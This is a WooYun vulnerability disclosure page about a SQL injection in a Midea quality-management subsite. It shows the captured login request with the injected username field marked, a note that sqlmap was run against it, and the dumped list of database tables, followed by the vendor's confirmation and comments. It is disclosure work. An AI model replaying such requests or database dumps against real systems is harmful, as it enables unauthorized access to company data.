当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145121

漏洞标题:美的某分站SQL注入漏洞

相关厂商:midea.com

漏洞作者: 路人甲

提交时间:2015-10-07 08:40

修复时间:2015-11-21 19:34

公开时间:2015-11-21 19:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

初看 http://qms.midea.com.cn/ 登录框没有什么问题,也不想爆破

QQ图片20151007003438.png


但是发现链接 http://qms.midea.com.cn/CE/default.aspx 与上面的系统一样

QQ图片20151007003613.png


很明显,后端数据库类型为:Oracle
登录过程进行抓包

POST /CE/default.aspx HTTP/1.1
Host: qms.midea.com.cn
Proxy-Connection: keep-alive
Content-Length: 250
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://qms.midea.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://qms.midea.com.cn/CE/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=uc5ues45xgqzgq2zjqk045vm
__VIEWSTATE=%2FwEPDwULLTEyODkwNjgzOTMPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BSfor6XnlKjmiLfkuI3lrZjlnKjmiJbogIXlr4bnoIHplJnor6%2FvvIFkZGTudlv6iFY8jWXoEVrL4hLt%2FZp3Jg%3D%3D&DDL_ZZ=2149&TextBoxUserName=admin*&TextBoxPassword=admin&ButtonLogin=%E7%99%BB+%E5%BD%95


使用sqlmap直接跑数据:

QQ图片20151007003819.jpg


全部数据库名称:

QQ图片20151007003922.jpg


获取当前数据库名称:

QQ图片20151007004026.jpg


列出当前库的全部数据表:

Database: QMSCEADMIN
[248 tables]
+--------------------------------+
| AA                             |
| BASE_ALLOW_VENDOR_LIST         |
| BASE_ERP_TO_QMS_ITEMS          |
| BASE_ERP_TO_QMS_VENDORS_INFO   |
| CE_IQC_QUOTA_UPDATE            |
| CE_OQC_FUNC_REP                |
| CE_OQC_SIGNAL                  |
| CE_OQC_WENSHE                  |
| CP_UPDATE_APLLYLIST_LOG        |
| CTQ_ITEM_MANAGE                |
| CTQ_SPECTFICATIONS             |
| CTXSYS_DATABASE_USERS          |
| CTXSYS_MODULE_DATABASE         |
| CTXSYS_SYSTEM_STRUCTURE        |
| CTXSYS_SYSTEM_USERNAMEMATCH    |
| CTXSYS_SYSTEM_USERS            |
| CTX_WORK_FLOW_EMAIL            |
| EARLY_PRODUCT_REPORT_QUERY     |
| ERP_W_QMS_SCRAP                |
| IQC00_ASSORTMENT               |
| IQC00_ASSORTMENT_BAK           |
| IQC00_BASE_APLLYLIST           |
| IQC00_BASE_APLLYLIST_1         |
| IQC00_BASE_MATERIAL_SHOTNAME   |
| IQC00_DEFECT_ASSORTMENT        |
| IQC01_INSPECT_LPNNUMBER        |
| IQC01_INSPECT_MIDEA            |
| IQC01_INSPECT_MIDEA01          |
| IQC01_INSPECT_MIDEA01_LOG      |
| IQC01_INSPECT_MIDEA_ITEMA      |
| IQC01_INSPECT_VENDOR           |
| IQC01_INSPECT_VENDOR_ITEMA     |
| IQC02_ACRE_MIDEA               |
| IQC02_ORIG_INSPECT             |
| IQC02_SAMPLESTANDARD           |
| IQC02_SWATCHLETTER             |
| IQC04_SPEC02_ITEMS             |
| IQC_8D_AUDIT_ITEM              |
| IQC_8D_CHECK_ITEM              |
| IQC_8D_INSPECTION_ITEM         |
| IQC_8D_INSPECTION_REPORT       |
| IQC_BASE_APLLYLIST_DEL_LOG     |
| IQC_CUSTOMER_COMPLAINTS        |
| IQC_EAELY_INSPECT_ORIG_M       |
| IQC_EARLY_INSPECT              |
| IQC_EARLY_INSPECT_LOG          |
| IQC_EARLY_RECORD               |
| IQC_EXCEPTION_INFORMATION      |
| IQC_GYS_WORKFLOW               |
| IQC_INSPECTION                 |
| IQC_INSPECT_ITEM               |
| IQC_INSPECT_ITEM_D             |
| IQC_INSPECT_MOP_LIST           |
| IQC_INSPECT_ORIG_M             |
| IQC_INSPECT_ORIG_MOP           |
| IQC_INSPECT_ORIG_M_LOG         |
| IQC_KEY3_REVIEW_REC            |
| IQC_LOSS_RECORD                |
| IQC_MAIN_WORKFLOW              |
| IQC_MONTH_PLAN                 |
| IQC_ORT_MONTH_PLAN             |
| IQC_ORT_TYPE_RECORD            |
| IQC_ORT_TYPE_TEST              |
| IQC_PART_BASIS_MESSAGE         |
| IQC_PART_BASIS_MESSAGE1        |
| IQC_PART_BASIS_MESSAGE_LOG     |
| IQC_PART_MESSAGE_DEL_LOG       |
| IQC_PRD10_MATERAIL_REJECT      |
| IQC_ROHS_WORKFLOW              |
| IQC_SAMPLESHIFT                |
| IQC_SCREEN_INSPECTION          |
| IQC_SCREEN_LIST                |
| IQC_SPECIAL_PROCURE            |
| IQC_TEST_MAINTAIN              |
| IQC_TEST_REPORT                |
| IQC_TEST_REPORT_DROP           |
| IQC_TEST_WORKFLOW              |
| IQC_TO_SCM_APLLYLIST_LOG       |
| IQC_TR_SPECIFICATIONS          |
| IQC_TYPE_RECORD                |
| IQC_TYPE_TEST                  |
| IQC_UPDATA_SCM_LOG             |
| IQC_VENDOR_MASTER_D            |
| IQC_VENDOR_MASTER_M            |
| IQC_XINGSHIWEITUO              |
| IQC_XS_LIST                    |
| ITEM_UPDATE_LOG                |
| OQC_TRIAL_PRO_INF_TABLES       |
| PDM_TO_QMS_CPCECNDRAW_LOG      |
| PDM_TO_QMS_CPCECNDRAW_M        |
| PQC_BOM_CONTRAST               |
| PQC_MATERAIL_REJECT            |
| PUB_IQC00_INSPECT_MIDEA        |
| QIS7_CAPABILITIES              |
| QIS7_CERTIFICATES              |
| QIS7_CLMINPUTCHARTS            |
| QIS7_DATAEDITORS               |
| QIS7_DATAIMIGRATES             |
| QIS7_DOEANALYSIS               |
| QIS7_EFFECTIVEINDEXES          |
| QIS7_INPUTFORMS                |
| QIS7_MACHINDATACAPTURE         |
| QIS7_MANHATTANS                |
| QIS7_MSANALYSIS                |
| QIS7_MULTICHARTS               |
| QIS7_PARETOCHARTS              |
| QIS7_PERFERMANCES              |
| QIS7_QUERIES                   |
| QIS7_REALTIMEINPUT             |
| QIS7_REMOTEDATATRANSFER        |
| QIS7_SCATTERS                  |
| QIS7_SCREENMONITOR             |
| QIS7_SHEWHARTS                 |
| QIS7_SPECIALCERTIFICATES       |
| QIS7_STATISMONITOR             |
| QIS7_SYSMONITORS               |
| QIS7_TRANSACTIONMANAGER        |
| QIS7_VARIATIONS                |
| QIS7_WORKFLOWMANAGER           |
| QIS_SYSTEM_AUDITORS            |
| QIS_SYSTEM_COMDATAEXPORT       |
| QIS_SYSTEM_COMDATAFILTERS      |
| QIS_SYSTEM_COMMDATATRANSFER    |
| QIS_SYSTEM_COMPARAMETERS       |
| QIS_SYSTEM_EMAILSERVERINFOR    |
| QIS_SYSTEM_EXCEPTION           |
| QIS_SYSTEM_EXCEPTVALUE         |
| QIS_SYSTEM_EXTRACTDATA         |
| QIS_SYSTEM_IBMMQDEFINITION     |
| QIS_SYSTEM_IBMMQINPUTFORMS     |
| QIS_SYSTEM_IBMMQMANAGER        |
| QIS_SYSTEM_IBMMQMSGRESOLUTION  |
| QIS_SYSTEM_IBMMQMSGRESTABLE    |
| QIS_SYSTEM_RECSDATAFILTERS     |
| QIS_SYSTEM_RECSTRANSFROMDB     |
| QIS_SYSTEM_REPORTFILETYPE      |
| QIS_SYSTEM_SAPRFCFUNCTIONS     |
| QIS_SYSTEM_SAPRFCINTERFACE     |
| QIS_SYSTEM_SAPRFCOPERCONFIRM   |
| QIS_SYSTEM_SAPRFCPARAMVALUES   |
| QIS_SYSTEM_SAPRFCQISOPERATION  |
| QIS_SYSTEM_SAPROUTELOG         |
| QIS_SYSTEM_SAPSVRINTERFACE     |
| QIS_SYSTEM_SAPSVROPERCONFIRM   |
| QIS_SYSTEM_SAPSVRPARAMVALUES   |
| QIS_SYSTEM_SAPSVRQISOPERATION  |
| QIS_SYSTEM_SAPUSERINFOR        |
| QIS_SYSTEM_SENDMSGSTRUCTURE    |
| QIS_SYSTEM_SENDMSGTEMPLATE     |
| QIS_SYSTEM_WORKFLOWSERVERLOG   |
| QIS_SYS_ARCHBATCHINTABLE       |
| QIS_SYS_ARCHIVEKEYWORDS        |
| QIS_SYS_AUTHAGENTNAME          |
| QIS_SYS_BACKRECLOGTABLE        |
| QIS_SYS_BACKUPDELETERECS       |
| QIS_SYS_BARCODEPRINTPRM        |
| QIS_SYS_BARCODEPRNPARAMETER    |
| QIS_SYS_BARCODESTDPARAMETER    |
| QIS_SYS_BAS00_BATCH_NO         |
| QIS_SYS_BATCHBINCALLS          |
| QIS_SYS_CHARTINPUTPICTURE      |
| QIS_SYS_CHARTPOINTTRACE        |
| QIS_SYS_CHOICELISTS            |
| QIS_SYS_CLMINPUTCHARTS         |
| QIS_SYS_COMPONENTTABLE         |
| QIS_SYS_COMTRANSACTIONRECOUT   |
| QIS_SYS_COMTRANSINPUTFORM      |
| QIS_SYS_COMTRANSRELATION       |
| QIS_SYS_COMTRANSSRVLOGTABLE    |
| QIS_SYS_DBRECSSRVLOGTABLE      |
| QIS_SYS_DBWEBSRVLOGTABLE       |
| QIS_SYS_DOCUMENTATIONSPECS     |
| QIS_SYS_DYNAMICDLLFORMS        |
| QIS_SYS_DYNAMICDLLPARAMS       |
| QIS_SYS_EMAILADDRESSMANAGER    |
| QIS_SYS_EXPERTCOMMENTS         |
| QIS_SYS_FLOWTRANSACTIONS       |
| QIS_SYS_FORMMODIFICATION       |
| QIS_SYS_FORMTABLEVIEW          |
| QIS_SYS_GROUPFIELDNAME         |
| QIS_SYS_IBMMQSRVLOGTABLE       |
| QIS_SYS_IMIGRATEPARAMS         |
| QIS_SYS_INDEXKEYS              |
| QIS_SYS_LANGUAGETABLE          |
| QIS_SYS_LIMITEDUSERTABLE       |
| QIS_SYS_LOTUSNOTESINFOR        |
| QIS_SYS_MANIPULATEOUTOFRECS    |
| QIS_SYS_ONLINEIDLETIME         |
| QIS_SYS_ONLINEUSELIST          |
| QIS_SYS_POPUPINPUTFORMLIST     |
| QIS_SYS_PRODLINEPARAMETER      |
| QIS_SYS_PRODLINESTOPCONTROL    |
| QIS_SYS_PRODLINESTOPDIRECT     |
| QIS_SYS_REALTIMEMONITOR        |
| QIS_SYS_RECFILTERCONSTS        |
| QIS_SYS_RELATEDFORMVALUE       |
| QIS_SYS_RELATEDSPECKEYITEMS    |
| QIS_SYS_RS232DATATRANSLOG      |
| QIS_SYS_RS232PARAMETERS        |
| QIS_SYS_SAPAUTODECISION        |
| QIS_SYS_SAPAUTODECISIONLOGO    |
| QIS_SYS_SAPCALLWEBSERVICE      |
| QIS_SYS_SCREENDISPLAYTEXT      |
| QIS_SYS_SHAREDDIRECTORY        |
| QIS_SYS_SPECIFICATIONS         |
| QIS_SYS_STATISVIEWTABLE        |
| QIS_SYS_STATSTRANSACTION       |
| QIS_SYS_SUBTEMPLETES           |
| QIS_SYS_SYSTEMITEMTABLE        |
| QIS_SYS_TABLEDEFINITION        |
| QIS_SYS_TABLERELATIONS         |
| QIS_SYS_TABLESPECKEYFIELDS     |
| QIS_SYS_TECHNICALGUIDES        |
| QIS_SYS_TRANSACTIONAGENT       |
| QIS_SYS_TRANSACTIONFLOWBACKUP  |
| QIS_SYS_TRANSACTIONFLOWMANAGER |
| QIS_SYS_TRANSACTIONFLOWTRASH   |
| QIS_SYS_TRANSCYCLETIME         |
| QIS_SYS_URLCONFIGURATION       |
| QIS_SYS_WEBDATABINDINTERFACE   |
| QIS_SYS_WEBDATACERTINTERFACE   |
| QIS_SYS_WEBDATAINTABLES        |
| QIS_SYS_WEBDATAINTERFACE       |
| QIS_SYS_WEBDATAOUTTABLES       |
| QIS_SYS_WEBPAGENAMES           |
| QIS_SYS_WEBQMSCALLBATCH        |
| QIS_SYS_WEBQMSCALLTABLE        |
| QIS_SYS_WEBSERVEMETHOD         |
| QIS_SYS_WEBSRVCALLDATASET      |
| QIS_SYS_WEBSRVCALLMETHOD       |
| QIS_SYS_WEBSRVCALLPROPERTY     |
| QIS_SYS_WEBSRVCALLTABLE        |
| QIS_SYS_WEBSVAPPBATCH          |
| QIS_SYS_WEBSVQMSDATASETDEF     |
| QIS_SYS_WEBSVQMSDEFINITION     |
| QIS_SYS_WORKFLOWTRANSACTIONS   |
| QIS_SYS_WORKTRANSFERATION      |
| QMS_ORG                        |
| SCM_PO_CHECK_LOG               |
| SRM_TO_QMS_WRITE_BACK          |
| SYS_MAIL_LOG                   |
| SYS_MAIL_TASK                  |
| T                              |
| TEST_TABLE                     |
| TEST_WORD_LIN                  |
| VENDOR_MATE                    |
| YLG_ZL_BLL                     |
| YLG_ZL_KB                      |
+--------------------------------+


漏洞证明即可,不再深入。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-07 19:32

厂商回复:

感谢乌云最厉害的白帽子@路人甲的提醒,我们召唤应用管理员进行修改。
顺便问一句:路人甲你RANK那么高有什么用...

最新状态:

暂无

漏洞评价:

评价

  1. 2015-10-07 08:49 | 羊大仙 ( 路人 | Rank:3 漏洞数:2 | 政府有一套秘密系统,一台机器,监视你,每...)

    我擦!这是我的啊

  2. 2015-10-07 09:56 | 美的集团(乌云厂商)

    装死,上班再确认。

  3. 2015-10-07 12:17 | DNS ( 普通白帽子 | Rank:711 漏洞数:73 | root@qisec.com)

    @美的集团 帽子就喜欢挖调皮的孩子,你等着收一对漏洞吧

  4. 2015-10-07 19:32 | 美的集团(乌云厂商)

    @DNS 难道你喜欢那些悄悄修复然后忽略的厂商?比如某中字头的。

  5. 2015-10-07 20:00 | DNS ( 普通白帽子 | Rank:711 漏洞数:73 | root@qisec.com)

    @美的集团 我喜欢你啊

  6. 2015-10-07 20:43 | 美的集团(乌云厂商)

    @DNS 虽然乌云是个基友平台,但你表白也不要太明显了...